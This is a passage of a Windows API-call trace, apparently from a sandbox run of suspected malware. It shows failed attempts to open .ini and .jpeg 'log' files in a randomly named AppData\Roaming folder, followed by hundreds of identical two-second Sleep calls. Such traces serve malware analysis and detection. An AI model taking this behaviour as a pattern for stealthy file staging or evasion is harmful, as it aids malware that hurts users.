ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.972] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a970) returned 1 [0202.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.972] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.972] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0202.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.973] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.973] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.973] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a6a0) returned 1 [0202.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.973] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.973] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.973] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89c80) returned 1 [0202.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.973] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.973] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.973] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a2b0) returned 1 [0202.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.973] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.973] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.973] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89890) returned 1 [0202.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.973] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.973] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.973] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0202.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.973] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.974] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0202.974] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0202.974] Sleep (dwMilliseconds=0x7d0) [0202.975] Sleep (dwMilliseconds=0x7d0) [0202.976] Sleep (dwMilliseconds=0x7d0) [0202.978] Sleep (dwMilliseconds=0x7d0) [0202.980] Sleep (dwMilliseconds=0x7d0) [0202.982] Sleep (dwMilliseconds=0x7d0) [0202.983] Sleep (dwMilliseconds=0x7d0) [0202.985] Sleep (dwMilliseconds=0x7d0) [0202.986] Sleep (dwMilliseconds=0x7d0) [0202.988] Sleep (dwMilliseconds=0x7d0) [0202.989] Sleep (dwMilliseconds=0x7d0) [0202.991] Sleep (dwMilliseconds=0x7d0) [0202.992] Sleep (dwMilliseconds=0x7d0) [0202.994] Sleep (dwMilliseconds=0x7d0) [0202.995] Sleep (dwMilliseconds=0x7d0) [0202.997] Sleep (dwMilliseconds=0x7d0) [0202.998] Sleep (dwMilliseconds=0x7d0) [0203.000] Sleep (dwMilliseconds=0x7d0) [0203.002] Sleep (dwMilliseconds=0x7d0) [0203.004] Sleep (dwMilliseconds=0x7d0) [0203.005] Sleep (dwMilliseconds=0x7d0) [0203.007] Sleep (dwMilliseconds=0x7d0) [0203.008] Sleep (dwMilliseconds=0x7d0) [0203.010] Sleep (dwMilliseconds=0x7d0) [0203.012] Sleep (dwMilliseconds=0x7d0) [0203.013] Sleep (dwMilliseconds=0x7d0) [0203.015] Sleep (dwMilliseconds=0x7d0) [0203.016] Sleep (dwMilliseconds=0x7d0) [0203.018] Sleep (dwMilliseconds=0x7d0) [0203.019] Sleep (dwMilliseconds=0x7d0) [0203.021] Sleep (dwMilliseconds=0x7d0) [0203.022] Sleep (dwMilliseconds=0x7d0) [0203.024] Sleep (dwMilliseconds=0x7d0) [0203.025] Sleep (dwMilliseconds=0x7d0) [0203.027] Sleep (dwMilliseconds=0x7d0) [0203.028] Sleep (dwMilliseconds=0x7d0) [0203.030] Sleep (dwMilliseconds=0x7d0) [0203.031] Sleep (dwMilliseconds=0x7d0) [0203.034] Sleep (dwMilliseconds=0x7d0) [0203.036] Sleep (dwMilliseconds=0x7d0) [0203.037] Sleep (dwMilliseconds=0x7d0) [0203.039] Sleep (dwMilliseconds=0x7d0) [0203.040] Sleep (dwMilliseconds=0x7d0) [0203.042] Sleep (dwMilliseconds=0x7d0) [0203.043] Sleep (dwMilliseconds=0x7d0) [0203.046] Sleep (dwMilliseconds=0x7d0) [0203.048] Sleep (dwMilliseconds=0x7d0) [0203.049] Sleep (dwMilliseconds=0x7d0) [0203.051] Sleep (dwMilliseconds=0x7d0) [0203.052] Sleep (dwMilliseconds=0x7d0) [0203.054] Sleep (dwMilliseconds=0x7d0) [0203.056] Sleep (dwMilliseconds=0x7d0) [0203.057] Sleep (dwMilliseconds=0x7d0) [0203.059] Sleep (dwMilliseconds=0x7d0) [0203.060] Sleep (dwMilliseconds=0x7d0) [0203.062] Sleep (dwMilliseconds=0x7d0) [0203.063] Sleep (dwMilliseconds=0x7d0) [0203.065] Sleep (dwMilliseconds=0x7d0) [0203.066] Sleep (dwMilliseconds=0x7d0) [0203.069] Sleep (dwMilliseconds=0x7d0) [0203.070] Sleep (dwMilliseconds=0x7d0) [0203.072] Sleep (dwMilliseconds=0x7d0) [0203.073] Sleep (dwMilliseconds=0x7d0) [0203.075] Sleep (dwMilliseconds=0x7d0) [0203.076] Sleep (dwMilliseconds=0x7d0) [0203.080] Sleep (dwMilliseconds=0x7d0) [0203.081] Sleep (dwMilliseconds=0x7d0) [0203.082] Sleep (dwMilliseconds=0x7d0) [0203.084] Sleep (dwMilliseconds=0x7d0) [0203.085] Sleep (dwMilliseconds=0x7d0) [0203.087] Sleep (dwMilliseconds=0x7d0) [0203.089] Sleep (dwMilliseconds=0x7d0) [0203.091] Sleep (dwMilliseconds=0x7d0) [0203.093] Sleep (dwMilliseconds=0x7d0) [0203.094] Sleep (dwMilliseconds=0x7d0) [0203.096] Sleep (dwMilliseconds=0x7d0) [0203.097] Sleep (dwMilliseconds=0x7d0) [0203.099] Sleep (dwMilliseconds=0x7d0) [0203.102] Sleep (dwMilliseconds=0x7d0) [0203.103] Sleep (dwMilliseconds=0x7d0) [0203.105] Sleep (dwMilliseconds=0x7d0) [0203.106] Sleep (dwMilliseconds=0x7d0) [0203.108] Sleep (dwMilliseconds=0x7d0) [0203.109] Sleep (dwMilliseconds=0x7d0) [0203.111] Sleep (dwMilliseconds=0x7d0) [0203.112] Sleep (dwMilliseconds=0x7d0) [0203.114] Sleep (dwMilliseconds=0x7d0) [0203.115] Sleep (dwMilliseconds=0x7d0) [0203.117] Sleep (dwMilliseconds=0x7d0) [0203.118] Sleep (dwMilliseconds=0x7d0) [0203.120] Sleep (dwMilliseconds=0x7d0) [0203.122] Sleep (dwMilliseconds=0x7d0) [0203.124] Sleep (dwMilliseconds=0x7d0) [0203.126] Sleep (dwMilliseconds=0x7d0) [0203.127] Sleep (dwMilliseconds=0x7d0) [0203.129] Sleep (dwMilliseconds=0x7d0) [0203.130] Sleep (dwMilliseconds=0x7d0) [0203.132] Sleep (dwMilliseconds=0x7d0) [0203.134] Sleep (dwMilliseconds=0x7d0) [0203.135] Sleep (dwMilliseconds=0x7d0) [0203.137] Sleep (dwMilliseconds=0x7d0) [0203.138] Sleep (dwMilliseconds=0x7d0) [0203.140] Sleep (dwMilliseconds=0x7d0) [0203.141] Sleep (dwMilliseconds=0x7d0) [0203.143] Sleep (dwMilliseconds=0x7d0) [0203.146] Sleep (dwMilliseconds=0x7d0) [0203.147] Sleep (dwMilliseconds=0x7d0) [0203.149] Sleep (dwMilliseconds=0x7d0) [0203.150] Sleep (dwMilliseconds=0x7d0) [0203.152] Sleep (dwMilliseconds=0x7d0) [0203.153] Sleep (dwMilliseconds=0x7d0) [0203.155] Sleep (dwMilliseconds=0x7d0) [0203.156] Sleep (dwMilliseconds=0x7d0) [0203.158] Sleep (dwMilliseconds=0x7d0) [0203.159] Sleep (dwMilliseconds=0x7d0) [0203.161] Sleep (dwMilliseconds=0x7d0) [0203.163] Sleep (dwMilliseconds=0x7d0) [0203.164] Sleep (dwMilliseconds=0x7d0) [0203.166] Sleep (dwMilliseconds=0x7d0) [0203.167] Sleep (dwMilliseconds=0x7d0) [0203.171] Sleep (dwMilliseconds=0x7d0) [0203.173] Sleep (dwMilliseconds=0x7d0) [0203.174] Sleep (dwMilliseconds=0x7d0) [0203.176] Sleep (dwMilliseconds=0x7d0) [0203.178] Sleep (dwMilliseconds=0x7d0) [0203.181] Sleep (dwMilliseconds=0x7d0) [0203.183] Sleep (dwMilliseconds=0x7d0) [0203.184] Sleep (dwMilliseconds=0x7d0) [0203.186] Sleep (dwMilliseconds=0x7d0) [0203.187] Sleep (dwMilliseconds=0x7d0) [0203.189] Sleep (dwMilliseconds=0x7d0) [0203.190] Sleep (dwMilliseconds=0x7d0) [0203.192] Sleep (dwMilliseconds=0x7d0) [0203.193] Sleep (dwMilliseconds=0x7d0) [0203.195] Sleep (dwMilliseconds=0x7d0) [0203.196] Sleep (dwMilliseconds=0x7d0) [0203.198] Sleep (dwMilliseconds=0x7d0) [0203.200] Sleep (dwMilliseconds=0x7d0) [0203.202] Sleep (dwMilliseconds=0x7d0) [0203.204] Sleep (dwMilliseconds=0x7d0) [0203.205] Sleep (dwMilliseconds=0x7d0) [0203.207] Sleep (dwMilliseconds=0x7d0) [0203.208] Sleep (dwMilliseconds=0x7d0) [0203.210] Sleep (dwMilliseconds=0x7d0) [0203.212] Sleep (dwMilliseconds=0x7d0) [0203.214] Sleep (dwMilliseconds=0x7d0) [0203.215] Sleep (dwMilliseconds=0x7d0) [0203.217] Sleep (dwMilliseconds=0x7d0) [0203.218] Sleep (dwMilliseconds=0x7d0) [0203.220] Sleep (dwMilliseconds=0x7d0) [0203.221] Sleep (dwMilliseconds=0x7d0) [0203.224] Sleep (dwMilliseconds=0x7d0) [0203.225] Sleep (dwMilliseconds=0x7d0) [0203.227] Sleep (dwMilliseconds=0x7d0) [0203.228] Sleep (dwMilliseconds=0x7d0) [0203.230] Sleep (dwMilliseconds=0x7d0) [0203.231] Sleep (dwMilliseconds=0x7d0) [0203.233] Sleep (dwMilliseconds=0x7d0) [0203.234] Sleep (dwMilliseconds=0x7d0) [0203.236] Sleep (dwMilliseconds=0x7d0) [0203.237] Sleep (dwMilliseconds=0x7d0) [0203.239] Sleep (dwMilliseconds=0x7d0) [0203.240] Sleep (dwMilliseconds=0x7d0) [0203.242] Sleep (dwMilliseconds=0x7d0) [0203.244] Sleep (dwMilliseconds=0x7d0) [0203.246] Sleep (dwMilliseconds=0x7d0) [0203.247] Sleep (dwMilliseconds=0x7d0) [0203.249] Sleep (dwMilliseconds=0x7d0) [0203.250] Sleep (dwMilliseconds=0x7d0) [0203.252] Sleep (dwMilliseconds=0x7d0) [0203.253] Sleep (dwMilliseconds=0x7d0) [0203.256] Sleep (dwMilliseconds=0x7d0) [0203.258] Sleep (dwMilliseconds=0x7d0) [0203.259] Sleep (dwMilliseconds=0x7d0) [0203.261] Sleep (dwMilliseconds=0x7d0) [0203.262] Sleep (dwMilliseconds=0x7d0) [0203.265] Sleep (dwMilliseconds=0x7d0) [0203.267] Sleep (dwMilliseconds=0x7d0) [0203.268] Sleep (dwMilliseconds=0x7d0) [0203.271] Sleep (dwMilliseconds=0x7d0) [0203.272] Sleep (dwMilliseconds=0x7d0) [0203.274] Sleep (dwMilliseconds=0x7d0) [0203.275] Sleep (dwMilliseconds=0x7d0) [0203.277] Sleep (dwMilliseconds=0x7d0) [0203.278] Sleep (dwMilliseconds=0x7d0) [0203.280] Sleep (dwMilliseconds=0x7d0) [0203.281] Sleep (dwMilliseconds=0x7d0) [0203.283] Sleep (dwMilliseconds=0x7d0) [0203.284] Sleep (dwMilliseconds=0x7d0) [0203.294] Sleep (dwMilliseconds=0x7d0) [0203.299] Sleep (dwMilliseconds=0x7d0) [0203.301] Sleep (dwMilliseconds=0x7d0) [0203.302] Sleep (dwMilliseconds=0x7d0) [0203.304] Sleep (dwMilliseconds=0x7d0) [0203.305] Sleep (dwMilliseconds=0x7d0) [0203.307] Sleep (dwMilliseconds=0x7d0) [0203.309] Sleep (dwMilliseconds=0x7d0) [0203.311] Sleep (dwMilliseconds=0x7d0) [0203.312] Sleep (dwMilliseconds=0x7d0) [0203.314] Sleep (dwMilliseconds=0x7d0) [0203.316] Sleep (dwMilliseconds=0x7d0) [0203.319] Sleep (dwMilliseconds=0x7d0) [0203.321] Sleep (dwMilliseconds=0x7d0) [0203.322] Sleep (dwMilliseconds=0x7d0) [0203.324] Sleep (dwMilliseconds=0x7d0) [0203.329] Sleep (dwMilliseconds=0x7d0) [0203.330] Sleep (dwMilliseconds=0x7d0) [0203.332] Sleep (dwMilliseconds=0x7d0) [0203.333] Sleep (dwMilliseconds=0x7d0) [0203.335] Sleep (dwMilliseconds=0x7d0) [0203.336] Sleep (dwMilliseconds=0x7d0) [0203.338] Sleep (dwMilliseconds=0x7d0) [0203.339] Sleep (dwMilliseconds=0x7d0) [0203.341] Sleep (dwMilliseconds=0x7d0) [0203.342] Sleep (dwMilliseconds=0x7d0) [0203.344] Sleep (dwMilliseconds=0x7d0) [0203.345] Sleep (dwMilliseconds=0x7d0) [0203.347] Sleep (dwMilliseconds=0x7d0) [0203.349] Sleep (dwMilliseconds=0x7d0) [0203.351] Sleep (dwMilliseconds=0x7d0) [0203.353] Sleep (dwMilliseconds=0x7d0) [0203.354] Sleep (dwMilliseconds=0x7d0) [0203.356] Sleep (dwMilliseconds=0x7d0) [0203.357] Sleep (dwMilliseconds=0x7d0) [0203.361] Sleep (dwMilliseconds=0x7d0) [0203.362] Sleep (dwMilliseconds=0x7d0) [0203.364] Sleep (dwMilliseconds=0x7d0) [0203.365] Sleep (dwMilliseconds=0x7d0) [0203.367] Sleep (dwMilliseconds=0x7d0) [0203.368] Sleep (dwMilliseconds=0x7d0) [0203.373] Sleep (dwMilliseconds=0x7d0) [0203.375] Sleep (dwMilliseconds=0x7d0) [0203.376] Sleep (dwMilliseconds=0x7d0) [0203.378] Sleep (dwMilliseconds=0x7d0) [0203.379] Sleep (dwMilliseconds=0x7d0) [0203.381] Sleep (dwMilliseconds=0x7d0) [0203.401] Sleep (dwMilliseconds=0x7d0) [0203.403] Sleep (dwMilliseconds=0x7d0) [0203.408] Sleep (dwMilliseconds=0x7d0) [0203.411] Sleep (dwMilliseconds=0x7d0) [0203.413] Sleep (dwMilliseconds=0x7d0) [0203.414] Sleep (dwMilliseconds=0x7d0) [0203.416] Sleep (dwMilliseconds=0x7d0) [0203.417] Sleep (dwMilliseconds=0x7d0) [0203.419] Sleep (dwMilliseconds=0x7d0) [0203.420] Sleep (dwMilliseconds=0x7d0) [0203.422] Sleep (dwMilliseconds=0x7d0) [0203.423] Sleep (dwMilliseconds=0x7d0) [0203.425] Sleep (dwMilliseconds=0x7d0) [0203.426] Sleep (dwMilliseconds=0x7d0) [0203.428] Sleep (dwMilliseconds=0x7d0) [0203.429] Sleep (dwMilliseconds=0x7d0) [0203.431] Sleep (dwMilliseconds=0x7d0) [0203.432] Sleep (dwMilliseconds=0x7d0) [0203.434] Sleep (dwMilliseconds=0x7d0) [0203.435] Sleep (dwMilliseconds=0x7d0) [0203.437] Sleep (dwMilliseconds=0x7d0) [0203.438] Sleep (dwMilliseconds=0x7d0) [0203.440] Sleep (dwMilliseconds=0x7d0) [0203.441] Sleep (dwMilliseconds=0x7d0) [0203.443] Sleep (dwMilliseconds=0x7d0) [0203.444] Sleep (dwMilliseconds=0x7d0) [0203.446] Sleep (dwMilliseconds=0x7d0) [0203.447] Sleep (dwMilliseconds=0x7d0) [0203.449] Sleep (dwMilliseconds=0x7d0) [0203.450] Sleep (dwMilliseconds=0x7d0) [0203.452] Sleep (dwMilliseconds=0x7d0) [0203.453] Sleep (dwMilliseconds=0x7d0) [0203.455] Sleep (dwMilliseconds=0x7d0) [0203.456] Sleep (dwMilliseconds=0x7d0) [0203.458] Sleep (dwMilliseconds=0x7d0) [0203.461] Sleep (dwMilliseconds=0x7d0) [0203.463] Sleep (dwMilliseconds=0x7d0) [0203.464] Sleep (dwMilliseconds=0x7d0) [0203.466] Sleep (dwMilliseconds=0x7d0) [0203.467] Sleep (dwMilliseconds=0x7d0) [0203.469] Sleep (dwMilliseconds=0x7d0) [0203.473] Sleep (dwMilliseconds=0x7d0) [0203.474] Sleep (dwMilliseconds=0x7d0) [0203.476] Sleep (dwMilliseconds=0x7d0) [0203.477] Sleep (dwMilliseconds=0x7d0) [0203.479] Sleep (dwMilliseconds=0x7d0) [0203.480] Sleep (dwMilliseconds=0x7d0) [0203.482] Sleep (dwMilliseconds=0x7d0) [0203.483] Sleep (dwMilliseconds=0x7d0) [0203.485] Sleep (dwMilliseconds=0x7d0) [0203.486] Sleep (dwMilliseconds=0x7d0) [0203.488] Sleep (dwMilliseconds=0x7d0) [0203.489] Sleep (dwMilliseconds=0x7d0) [0203.491] Sleep (dwMilliseconds=0x7d0) [0203.494] Sleep (dwMilliseconds=0x7d0) [0203.496] Sleep (dwMilliseconds=0x7d0) [0203.497] Sleep (dwMilliseconds=0x7d0) [0203.499] Sleep (dwMilliseconds=0x7d0) [0203.527] Sleep (dwMilliseconds=0x7d0) [0203.529] Sleep (dwMilliseconds=0x7d0) [0203.530] Sleep (dwMilliseconds=0x7d0) [0203.532] Sleep (dwMilliseconds=0x7d0) [0203.533] Sleep (dwMilliseconds=0x7d0) [0203.537] Sleep (dwMilliseconds=0x7d0) [0203.538] Sleep (dwMilliseconds=0x7d0) [0203.540] Sleep (dwMilliseconds=0x7d0) [0203.541] Sleep (dwMilliseconds=0x7d0) [0203.543] Sleep (dwMilliseconds=0x7d0) [0203.544] Sleep (dwMilliseconds=0x7d0) [0203.546] Sleep (dwMilliseconds=0x7d0) [0203.549] Sleep (dwMilliseconds=0x7d0) [0203.551] Sleep (dwMilliseconds=0x7d0) [0203.552] Sleep (dwMilliseconds=0x7d0) [0203.554] Sleep (dwMilliseconds=0x7d0) [0203.597] Sleep (dwMilliseconds=0x7d0) [0203.598] Sleep (dwMilliseconds=0x7d0) [0203.600] Sleep (dwMilliseconds=0x7d0) [0203.602] Sleep (dwMilliseconds=0x7d0) [0203.603] Sleep (dwMilliseconds=0x7d0) [0203.605] Sleep (dwMilliseconds=0x7d0) [0203.606] Sleep (dwMilliseconds=0x7d0) [0203.608] Sleep (dwMilliseconds=0x7d0) [0203.609] Sleep (dwMilliseconds=0x7d0) [0203.611] Sleep (dwMilliseconds=0x7d0) [0203.616] Sleep (dwMilliseconds=0x7d0) [0203.617] Sleep (dwMilliseconds=0x7d0) [0203.665] Sleep (dwMilliseconds=0x7d0) [0203.666] Sleep (dwMilliseconds=0x7d0) [0203.670] Sleep (dwMilliseconds=0x7d0) [0203.672] Sleep (dwMilliseconds=0x7d0) [0203.673] Sleep (dwMilliseconds=0x7d0) [0203.675] Sleep (dwMilliseconds=0x7d0) [0203.676] Sleep (dwMilliseconds=0x7d0) [0203.679] Sleep (dwMilliseconds=0x7d0) [0203.681] Sleep (dwMilliseconds=0x7d0) [0203.683] Sleep (dwMilliseconds=0x7d0) [0203.685] Sleep (dwMilliseconds=0x7d0) [0203.687] Sleep (dwMilliseconds=0x7d0) [0203.688] Sleep (dwMilliseconds=0x7d0) [0203.692] Sleep (dwMilliseconds=0x7d0) [0203.694] Sleep (dwMilliseconds=0x7d0) [0203.695] Sleep (dwMilliseconds=0x7d0) [0203.697] Sleep (dwMilliseconds=0x7d0) [0203.698] Sleep (dwMilliseconds=0x7d0) [0203.700] Sleep (dwMilliseconds=0x7d0) [0203.703] Sleep (dwMilliseconds=0x7d0) [0203.704] Sleep (dwMilliseconds=0x7d0) [0203.706] Sleep (dwMilliseconds=0x7d0) [0203.707] Sleep (dwMilliseconds=0x7d0) [0203.709] Sleep (dwMilliseconds=0x7d0) [0203.710] Sleep (dwMilliseconds=0x7d0) [0203.714] Sleep (dwMilliseconds=0x7d0) [0203.715] Sleep (dwMilliseconds=0x7d0) [0203.717] Sleep (dwMilliseconds=0x7d0) [0203.718] Sleep (dwMilliseconds=0x7d0) [0203.720] Sleep (dwMilliseconds=0x7d0) [0203.721] Sleep (dwMilliseconds=0x7d0) [0203.723] Sleep (dwMilliseconds=0x7d0) 